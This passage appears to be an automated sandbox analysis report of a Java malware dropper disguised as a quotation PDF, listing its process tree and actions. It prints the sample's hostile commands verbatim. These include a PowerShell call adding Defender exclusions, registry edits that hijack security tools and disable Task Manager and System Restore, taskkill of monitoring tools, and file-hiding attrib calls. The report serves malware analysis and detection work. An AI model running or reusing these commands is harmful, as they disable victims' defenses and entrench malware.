java.exe 202 PID 616 wrote to memory of 1852 616 java.exe 202 PID 1852 wrote to memory of 2020 1852 cmd.exe 203 PID 1852 wrote to memory of 2020 1852 cmd.exe 203 PID 1852 wrote to memory of 2020 1852 cmd.exe 203 PID 1852 wrote to memory of 1816 1852 cmd.exe 204 PID 1852 wrote to memory of 1816 1852 cmd.exe 204 PID 1852 wrote to memory of 1816 1852 cmd.exe 204 PID 616 wrote to memory of 1632 616 java.exe 205 PID 616 wrote to memory of 1632 616 java.exe 205 PID 616 wrote to memory of 1632 616 java.exe 205 PID 1632 wrote to memory of 1256 1632 cmd.exe 206 PID 1632 wrote to memory of 1256 1632 cmd.exe 206 PID 1632 wrote to memory of 1256 1632 cmd.exe 206 PID 1632 wrote to memory of 1844 1632 cmd.exe 207 PID 1632 wrote to memory of 1844 1632 cmd.exe 207 PID 1632 wrote to memory of 1844 1632 cmd.exe 207 PID 616 wrote to memory of 1592 616 java.exe 208 PID 616 wrote to memory of 1592 616 java.exe 208 PID 616 wrote to memory of 1592 616 java.exe 208 PID 1592 wrote to memory of 1952 1592 cmd.exe 209 PID 1592 wrote to memory of 1952 1592 cmd.exe 209 PID 1592 wrote to memory of 1952 1592 cmd.exe 209 PID 1592 wrote to memory of 1492 1592 cmd.exe 210 PID 1592 wrote to memory of 1492 1592 cmd.exe 210 PID 1592 wrote to memory of 1492 1592 cmd.exe 210 PID 616 wrote to memory of 564 616 java.exe 211 PID 616 wrote to memory of 564 616 java.exe 211 PID 616 wrote to memory of 564 616 java.exe 211 PID 564 wrote to memory of 1792 564 cmd.exe 212 PID 564 wrote to memory of 1792 564 cmd.exe 212 PID 564 wrote to memory of 1792 564 cmd.exe 212 PID 564 wrote to memory of 1092 564 cmd.exe 213 PID 564 wrote to memory of 1092 564 cmd.exe 213 PID 564 wrote to memory of 1092 564 cmd.exe 213 PID 616 wrote to memory of 1820 616 java.exe 214 PID 616 wrote to memory of 1820 616 java.exe 214 PID 616 wrote to memory of 1820 616 java.exe 214 PID 616 wrote to memory of 1644 616 java.exe 215 PID 616 wrote to memory of 1644 616 java.exe 215 PID 616 wrote to memory of 1644 616 java.exe 215 PID 1820 wrote to memory of 1408 1820 cmd.exe 217 PID 1820 wrote to memory of 1408 1820 cmd.exe 217 PID 1820 wrote to memory of 1408 1820 cmd.exe 217 PID 1820 wrote to memory of 1972 1820 cmd.exe 218 PID 1820 wrote to memory of 1972 1820 cmd.exe 218 PID 1820 wrote to memory of 1972 1820 cmd.exe 218 PID 616 wrote to memory of 2032 616 java.exe 219 PID 616 wrote to memory of 2032 616 java.exe 219 PID 616 wrote to memory of 2032 616 java.exe 219 PID 2032 wrote to memory of 1048 2032 cmd.exe 220 PID 2032 wrote to memory of 1048 2032 cmd.exe 220 PID 2032 wrote to memory of 1048 2032 cmd.exe 220 PID 2032 wrote to memory of 1788 2032 cmd.exe 221 PID 2032 wrote to memory of 1788 2032 cmd.exe 221 PID 2032 wrote to memory of 1788 2032 cmd.exe 221 PID 616 wrote to memory of 1520 616 java.exe 222 PID 616 wrote to memory of 1520 616 java.exe 222 PID 616 wrote to memory of 1520 616 java.exe 222 PID 1520 wrote to memory of 748 1520 cmd.exe 223 PID 1520 wrote to memory of 748 1520 cmd.exe 223 PID 1520 wrote to memory of 748 1520 cmd.exe 223 PID 1520 wrote to memory of 1908 1520 cmd.exe 224 PID 1520 wrote to memory of 1908 1520 cmd.exe 224 PID 1520 wrote to memory of 1908 1520 cmd.exe 224 PID 616 wrote to memory of 624 616 java.exe 225 PID 616 wrote to memory of 624 616 java.exe 225 PID 616 wrote to memory of 624 616 java.exe 225 PID 624 wrote to memory of 1904 624 cmd.exe 226 PID 624 wrote to memory of 1904 624 cmd.exe 226 PID 624 wrote to memory of 1904 624 cmd.exe 226 PID 624 wrote to memory of 328 624 cmd.exe 227 PID 624 wrote to memory of 328 624 cmd.exe 227 PID 624 wrote to memory of 328 624 cmd.exe 227 PID 616 wrote to memory of 1892 616 java.exe 228 PID 616 wrote to memory of 1892 616 java.exe 228 PID 616 wrote to memory of 1892 616 java.exe 228 PID 1892 wrote to memory of 1356 1892 cmd.exe 229 PID 1892 wrote to memory of 1356 1892 cmd.exe 229 PID 1892 wrote to memory of 1356 1892 cmd.exe 229 PID 1892 wrote to memory of 1580 1892 cmd.exe 230 PID 1892 wrote to memory of 1580 1892 cmd.exe 230 PID 1892 wrote to memory of 1580 1892 cmd.exe 230 PID 616 wrote to memory of 1488 616 java.exe 231 PID 616 wrote to memory of 1488 616 java.exe 231 PID 616 wrote to memory of 1488 616 java.exe 231 PID 1488 wrote to memory of 1832 1488 cmd.exe 232 PID 1488 wrote to memory of 1832 1488 cmd.exe 232 PID 1488 wrote to memory of 1832 1488 cmd.exe 232 PID 1488 wrote to memory of 1636 1488 cmd.exe 233 PID 1488 wrote to memory of 1636 1488 cmd.exe 233 PID 1488 wrote to memory of 1636 1488 cmd.exe 233 PID 616 wrote to memory of 1768 616 java.exe 234 PID 616 wrote to memory of 1768 616 java.exe 234 PID 616 wrote to memory of 1768 616 java.exe 234 PID 1768 wrote to memory of 1040 1768 cmd.exe 235 PID 1768 wrote to memory of 1040 1768 cmd.exe 235 PID 1768 wrote to memory of 1040 1768 cmd.exe 235 PID 1768 wrote to memory of 1560 1768 cmd.exe 236 PID 1768 wrote to memory of 1560 1768 cmd.exe 236 PID 1768 wrote to memory of 1560 1768 cmd.exe 236 PID 616 wrote to memory of 1836 616 java.exe 237 PID 616 wrote to memory of 1836 616 java.exe 237 PID 616 wrote to memory of 1836 616 java.exe 237 PID 1836 wrote to memory of 1916 1836 cmd.exe 238 PID 1836 wrote to memory of 1916 1836 cmd.exe 238 PID 1836 wrote to memory of 1916 1836 cmd.exe 238 PID 616 wrote to memory of 1992 616 java.exe 239 PID 616 wrote to memory of 1992 616 java.exe 239 PID 616 wrote to memory of 1992 616 java.exe 239 PID 1836 wrote to memory of 1424 1836 cmd.exe 241 PID 1836 wrote to memory of 1424 1836 cmd.exe 241 PID 1836 wrote to memory of 1424 1836 cmd.exe 241 PID 616 wrote to memory of 792 616 java.exe 242 PID 616 wrote to memory of 792 616 java.exe 242 PID 616 wrote to memory of 792 616 java.exe 242 PID 792 wrote to memory of 1816 792 cmd.exe 243 PID 792 wrote to memory of 1816 792 cmd.exe 243 PID 792 wrote to memory of 1816 792 cmd.exe 243 PID 792 wrote to memory of 1524 792 cmd.exe 244 PID 792 wrote to memory of 1524 792 cmd.exe 244 PID 792 wrote to memory of 1524 792 cmd.exe 244 PID 616 wrote to memory of 1844 616 java.exe 245 PID 616 wrote to memory of 1844 616 java.exe 245 PID 616 wrote to memory of 1844 616 java.exe 245 PID 1844 wrote to memory of 1964 1844 cmd.exe 246 PID 1844 wrote to memory of 1964 1844 cmd.exe 246 PID 1844 wrote to memory of 1964 1844 cmd.exe 246 PID 1844 wrote to memory of 1616 1844 cmd.exe 247 PID 1844 wrote to memory of 1616 1844 cmd.exe 247 PID 1844 wrote to memory of 1616 1844 cmd.exe 247 PID 616 wrote to memory of 1056 616 java.exe 248 PID 616 wrote to memory of 1056 616 java.exe 248 PID 616 wrote to memory of 1056 616 java.exe 248 PID 1056 wrote to memory of 1792 1056 cmd.exe 249 PID 1056 wrote to memory of 1792 1056 cmd.exe 249 PID 1056 wrote to memory of 1792 1056 cmd.exe 249 PID 1056 wrote to memory of 1984 1056 cmd.exe 250 PID 1056 wrote to memory of 1984 1056 cmd.exe 250 PID 1056 wrote to memory of 1984 1056 cmd.exe 250 PID 616 wrote to memory of 324 616 java.exe 251 PID 616 wrote to memory of 324 616 java.exe 251 PID 616 wrote to memory of 324 616 java.exe 251 PID 324 wrote to memory of 1088 324 cmd.exe 252 PID 324 wrote to memory of 1088 324 cmd.exe 252 PID 324 wrote to memory of 1088 324 cmd.exe 252 PID 324 wrote to memory of 528 324 cmd.exe 253 PID 324 wrote to memory of 528 324 cmd.exe 253 PID 324 wrote to memory of 528 324 cmd.exe 253 PID 616 wrote to memory of 1068 616 java.exe 254 PID 616 wrote to memory of 1068 616 java.exe 254 PID 616 wrote to memory of 1068 616 java.exe 254 PID 1068 wrote to memory of 2040 1068 cmd.exe 255 PID 1068 wrote to memory of 2040 1068 cmd.exe 255 PID 1068 wrote to memory of 2040 1068 cmd.exe 255 PID 1068 wrote to memory of 820 1068 cmd.exe 256 PID 1068 wrote to memory of 820 1068 cmd.exe 256 PID 1068 wrote to memory of 820 1068 cmd.exe 256 PID 616 wrote to memory of 288 616 java.exe 257 PID 616 wrote to memory of 288 616 java.exe 257 PID 616 wrote to memory of 288 616 java.exe 257 PID 288 wrote to memory of 1788 288 cmd.exe 258 PID 288 wrote to memory of 1788 288 cmd.exe 258 PID 288 wrote to memory of 1788 288 cmd.exe 258 PID 288 wrote to memory of 240 288 cmd.exe 259 PID 288 wrote to memory of 240 288 cmd.exe 259 PID 288 wrote to memory of 240 288 cmd.exe 259 PID 616 wrote to memory of 1956 616 java.exe 260 PID 616 wrote to memory of 1956 616 java.exe 260 PID 616 wrote to memory of 1956 616 java.exe 260 PID 1956 wrote to memory of 1072 1956 cmd.exe 261 PID 1956 wrote to memory of 1072 1956 cmd.exe 261 PID 1956 wrote to memory of 1072 1956 cmd.exe 261 PID 1956 wrote to memory of 1904 1956 cmd.exe 262 PID 1956 wrote to memory of 1904 1956 cmd.exe 262 PID 1956 wrote to memory of 1904 1956 cmd.exe 262 PID 616 wrote to memory of 1060 616 java.exe 263 PID 616 wrote to memory of 1060 616 java.exe 263 PID 616 wrote to memory of 1060 616 java.exe 263 PID 1060 wrote to memory of 1960 1060 cmd.exe 264 PID 1060 wrote to memory of 1960 1060 cmd.exe 264 PID 1060 wrote to memory of 1960 1060 cmd.exe 264 PID 1060 wrote to memory of 1580 1060 cmd.exe 265 PID 1060 wrote to memory of 1580 1060 cmd.exe 265 PID 1060 wrote to memory of 1580 1060 cmd.exe 265 PID 616 wrote to memory of 1932 616 java.exe 266 PID 616 wrote to memory of 1932 616 java.exe 266 PID 616 wrote to memory of 1932 616 java.exe 266 PID 1932 wrote to memory of 1988 1932 cmd.exe 267 PID 1932 wrote to memory of 1988 1932 cmd.exe 267 PID 1932 wrote to memory of 1988 1932 cmd.exe 267 PID 1932 wrote to memory of 1472 1932 cmd.exe 268 PID 1932 wrote to memory of 1472 1932 cmd.exe 268 PID 1932 wrote to memory of 1472 1932 cmd.exe 268 PID 616 wrote to memory of 1040 616 java.exe 269 PID 616 wrote to memory of 1040 616 java.exe 269 PID 616 wrote to memory of 1040 616 java.exe 269 PID 616 wrote to memory of 1344 616 java.exe 271 PID 616 wrote to memory of 1344 616 java.exe 271 PID 616 wrote to memory of 1344 616 java.exe 271 PID 1344 wrote to memory of 1888 1344 cmd.exe 272 PID 1344 wrote to memory of 1888 1344 cmd.exe 272 PID 1344 wrote to memory of 1888 1344 cmd.exe 272 PID 1344 wrote to memory of 744 1344 cmd.exe 273 PID 1344 wrote to memory of 744 1344 cmd.exe 273 PID 1344 wrote to memory of 744 1344 cmd.exe 273 PID 616 wrote to memory of 2024 616 java.exe 274 PID 616 wrote to memory of 2024 616 java.exe 274 PID 616 wrote to memory of 2024 616 java.exe 274 PID 2024 wrote to memory of 1328 2024 cmd.exe 275 PID 2024 wrote to memory of 1328 2024 cmd.exe 275 PID 2024 wrote to memory of 1328 2024 cmd.exe 275 PID 2024 wrote to memory of 1256 2024 cmd.exe 276 PID 2024 wrote to memory of 1256 2024 cmd.exe 276 PID 2024 wrote to memory of 1256 2024 cmd.exe 276 PID 616 wrote to memory of 1952 616 java.exe 277 PID 616 wrote to memory of 1952 616 java.exe 277 PID 616 wrote to memory of 1952 616 java.exe 277 PID 1952 wrote to memory of 1964 1952 cmd.exe 278 PID 1952 wrote to memory of 1964 1952 cmd.exe 278 PID 1952 wrote to memory of 1964 1952 cmd.exe 278 PID 1952 wrote to memory of 1848 1952 cmd.exe 279 PID 1952 wrote to memory of 1848 1952 cmd.exe 279 PID 1952 wrote to memory of 1848 1952 cmd.exe 279 PID 616 wrote to memory of 648 616 java.exe 280 PID 616 wrote to memory of 648 616 java.exe 280 PID 616 wrote to memory of 648 616 java.exe 280 PID 648 wrote to memory of 1984 648 cmd.exe 281 PID 648 wrote to memory of 1984 648 cmd.exe 281 PID 648 wrote to memory of 1984 648 cmd.exe 281 PID 648 wrote to memory of 1972 648 cmd.exe 282 PID 648 wrote to memory of 1972 648 cmd.exe 282 PID 648 wrote to memory of 1972 648 cmd.exe 282 PID 616 wrote to memory of 2000 616 java.exe 283 PID 616 wrote to memory of 2000 616 java.exe 283 PID 616 wrote to memory of 2000 616 java.exe 283 PID 2000 wrote to memory of 1980 2000 cmd.exe 284 PID 2000 wrote to memory of 1980 2000 cmd.exe 284 PID 2000 wrote to memory of 1980 2000 cmd.exe 284 PID 2000 wrote to memory of 2040 2000 cmd.exe 285 PID 2000 wrote to memory of 2040 2000 cmd.exe 285 PID 2000 wrote to memory of 2040 2000 cmd.exe 285 PID 616 wrote to memory of 1744 616 java.exe 286 PID 616 wrote to memory of 1744 616 java.exe 286 PID 616 wrote to memory of 1744 616 java.exe 286 PID 1744 wrote to memory of 1648 1744 cmd.exe 287 PID 1744 wrote to memory of 1648 1744 cmd.exe 287 PID 1744 wrote to memory of 1648 1744 cmd.exe 287 PID 1744 wrote to memory of 320 1744 cmd.exe 288 PID 1744 wrote to memory of 320 1744 cmd.exe 288 PID 1744 wrote to memory of 320 1744 cmd.exe 288 PID 616 wrote to memory of 2044 616 java.exe 289 PID 616 wrote to memory of 2044 616 java.exe 289 PID 616 wrote to memory of 2044 616 java.exe 289 PID 2044 wrote to memory of 1072 2044 cmd.exe 290 PID 2044 wrote to memory of 1072 2044 cmd.exe 290 PID 2044 wrote to memory of 1072 2044 cmd.exe 290 PID 2044 wrote to memory of 1896 2044 cmd.exe 291 PID 2044 wrote to memory of 1896 2044 cmd.exe 291 PID 2044 wrote to memory of 1896 2044 cmd.exe 291 PID 616 wrote to memory of 1948 616 java.exe 292 PID 616 wrote to memory of 1948 616 java.exe 292 PID 616 wrote to memory of 1948 616 java.exe 292 PID 1948 wrote to memory of 1580 1948 cmd.exe 293 PID 1948 wrote to memory of 1580 1948 cmd.exe 293 PID 1948 wrote to memory of 1580 1948 cmd.exe 293 PID 1948 wrote to memory of 1636 1948 cmd.exe 294 PID 1948 wrote to memory of 1636 1948 cmd.exe 294 PID 1948 wrote to memory of 1636 1948 cmd.exe 294 PID 616 wrote to memory of 1976 616 java.exe 295 PID 616 wrote to memory of 1976 616 java.exe 295 PID 616 wrote to memory of 1976 616 java.exe 295 PID 1976 wrote to memory of 1780 1976 cmd.exe 296 PID 1976 wrote to memory of 1780 1976 cmd.exe 296 PID 1976 wrote to memory of 1780 1976 cmd.exe 296 PID 1976 wrote to memory of 1424 1976 cmd.exe 297 PID 1976 wrote to memory of 1424 1976 cmd.exe 297 PID 1976 wrote to memory of 1424 1976 cmd.exe 297 PID 616 wrote to memory of 2020 616 java.exe 298 PID 616 wrote to memory of 2020 616 java.exe 298 PID 616 wrote to memory of 2020 616 java.exe 298 PID 2020 wrote to memory of 1116 2020 cmd.exe 299 PID 2020 wrote to memory of 1116 2020 cmd.exe 299 PID 2020 wrote to memory of 1116 2020 cmd.exe 299 PID 2020 wrote to memory of 1532 2020 cmd.exe 300 PID 2020 wrote to memory of 1532 2020 cmd.exe 300 PID 2020 wrote to memory of 1532 2020 cmd.exe 300 PID 616 wrote to memory of 688 616 java.exe 301 PID 616 wrote to memory of 688 616 java.exe 301 PID 616 wrote to memory of 688 616 java.exe 301 PID 688 wrote to memory of 1184 688 cmd.exe 302 PID 688 wrote to memory of 1184 688 cmd.exe 302 PID 688 wrote to memory of 1184 688 cmd.exe 302 PID 688 wrote to memory of 1544 688 cmd.exe 303 PID 688 wrote to memory of 1544 688 cmd.exe 303 PID 688 wrote to memory of 1544 688 cmd.exe 303 PID 616 wrote to memory of 1256 616 java.exe 304 PID 616 wrote to memory of 1256 616 java.exe 304 PID 616 wrote to memory of 1256 616 java.exe 304 PID 1256 wrote to memory of 1492 1256 cmd.exe 305 PID 1256 wrote to memory of 1492 1256 cmd.exe 305 PID 1256 wrote to memory of 1492 1256 cmd.exe 305 PID 1256 wrote to memory of 1092 1256 cmd.exe 306 PID 1256 wrote to memory of 1092 1256 cmd.exe 306 PID 1256 wrote to memory of 1092 1256 cmd.exe 306 PID 616 wrote to memory of 680 616 java.exe 307 PID 616 wrote to memory of 680 616 java.exe 307 PID 616 wrote to memory of 680 616 java.exe 307 PID 680 wrote to memory of 1984 680 cmd.exe 308 PID 680 wrote to memory of 1984 680 cmd.exe 308 PID 680 wrote to memory of 1984 680 cmd.exe 308 PID 680 wrote to memory of 1516 680 cmd.exe 309 PID 680 wrote to memory of 1516 680 cmd.exe 309 PID 680 wrote to memory of 1516 680 cmd.exe 309 PID 616 wrote to memory of 820 616 java.exe 310 PID 616 wrote to memory of 820 616 java.exe 310 PID 616 wrote to memory of 820 616 java.exe 310 PID 820 wrote to memory of 2040 820 cmd.exe 311 PID 820 wrote to memory of 2040 820 cmd.exe 311 PID 820 wrote to memory of 2040 820 cmd.exe 311 PID 820 wrote to memory of 748 820 cmd.exe 312 PID 820 wrote to memory of 748 820 cmd.exe 312 PID 820 wrote to memory of 748 820 cmd.exe 312 PID 616 wrote to memory of 240 616 java.exe 313 PID 616 wrote to memory of 240 616 java.exe 313 PID 616 wrote to memory of 240 616 java.exe 313 PID 240 wrote to memory of 1904 240 cmd.exe 314 PID 240 wrote to memory of 1904 240 cmd.exe 314 PID 240 wrote to memory of 1904 240 cmd.exe 314 PID 240 wrote to memory of 1552 240 cmd.exe 315 PID 240 wrote to memory of 1552 240 cmd.exe 315 PID 240 wrote to memory of 1552 240 cmd.exe 315 PID 616 wrote to memory of 2000 616 java.exe 316 PID 616 wrote to memory of 2000 616 java.exe 316 PID 616 wrote to memory of 2000 616 java.exe 316 PID 2000 wrote to memory of 1860 2000 cmd.exe 317 PID 2000 wrote to memory of 1860 2000 cmd.exe 317 PID 2000 wrote to memory of 1860 2000 cmd.exe 317 PID 2000 wrote to memory of 1820 2000 cmd.exe 318 PID 2000 wrote to memory of 1820 2000 cmd.exe 318 PID 2000 wrote to memory of 1820 2000 cmd.exe 318 PID 616 wrote to memory of 1840 616 java.exe 319 PID 616 wrote to memory of 1840 616 java.exe 319 PID 616 wrote to memory of 1840 616 java.exe 319 PID 1840 wrote to memory of 2032 1840 cmd.exe 320 PID 1840 wrote to memory of 2032 1840 cmd.exe 320 PID 1840 wrote to memory of 2032 1840 cmd.exe 320 PID 1840 wrote to memory of 796 1840 cmd.exe 321 PID 1840 wrote to memory of 796 1840 cmd.exe 321 PID 1840 wrote to memory of 796 1840 cmd.exe 321 PID 616 wrote to memory of 624 616 java.exe 322 PID 616 wrote to memory of 624 616 java.exe 322 PID 616 wrote to memory of 624 616 java.exe 322 PID 624 wrote to memory of 1340 624 cmd.exe 323 PID 624 wrote to memory of 1340 624 cmd.exe 323 PID 624 wrote to memory of 1340 624 cmd.exe 323 PID 624 wrote to memory of 1932 624 cmd.exe 324 PID 624 wrote to memory of 1932 624 cmd.exe 324 PID 624 wrote to memory of 1932 624 cmd.exe 324 PID 616 wrote to memory of 1940 616 java.exe 325 PID 616 wrote to memory of 1940 616 java.exe 325 PID 616 wrote to memory of 1940 616 java.exe 325 PID 616 wrote to memory of 1592 616 java.exe 327 PID 616 wrote to memory of 1592 616 java.exe 327 PID 616 wrote to memory of 1592 616 java.exe 327 PID 1592 wrote to memory of 1628 1592 cmd.exe 328 PID 1592 wrote to memory of 1628 1592 cmd.exe 328 PID 1592 wrote to memory of 1628 1592 cmd.exe 328 PID 1592 wrote to memory of 1884 1592 cmd.exe 329 PID 1592 wrote to memory of 1884 1592 cmd.exe 329 PID 1592 wrote to memory of 1884 1592 cmd.exe 329 PID 616 wrote to memory of 1952 616 java.exe 330 PID 616 wrote to memory of 1952 616 java.exe 330 PID 616 wrote to memory of 1952 616 java.exe 330 PID 616 wrote to memory of 1080 616 java.exe 332 PID 616 wrote to memory of 1080 616 java.exe 332 PID 616 wrote to memory of 1080 616 java.exe 332 PID 616 wrote to memory of 1916 616 java.exe 334 PID 616 wrote to memory of 1916 616 java.exe 334 PID 616 wrote to memory of 1916 616 java.exe 334 PID 616 wrote to memory of 1964 616 java.exe 336 PID 616 wrote to memory of 1964 616 java.exe 336 PID 616 wrote to memory of 1964 616 java.exe 336 PID 616 wrote to memory of 1912 616 java.exe 338 PID 616 wrote to memory of 1912 616 java.exe 338 PID 616 wrote to memory of 1912 616 java.exe 338 PID 616 wrote to memory of 1520 616 java.exe 340 PID 616 wrote to memory of 1520 616 java.exe 340 PID 616 wrote to memory of 1520 616 java.exe 340 PID 616 wrote to memory of 1828 616 java.exe 342 PID 616 wrote to memory of 1828 616 java.exe 342 PID 616 wrote to memory of 1828 616 java.exe 342 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1764 attrib.exe 1744 attrib.exe 1824 attrib.exe 1840 attrib.exe 1852 attrib.exe 1188 attrib.exe 1784 attrib.exe 1780 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\TECHNO GROUP REQUEST FOR QUOTATION RFQ_pdf.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:288
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:680 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1824
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1840
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1852
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1188
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1784
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1780
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1764
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class2⤵
- Views/modifies file attributes
PID:1744
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:328
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1544
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1908
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1932
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:1948
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1980
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:1168
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1032
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:1424
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:472
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:744
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1532
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1804
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1256
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1816
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1832
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1740
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1548
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:1900
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:368
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:1072
-
-
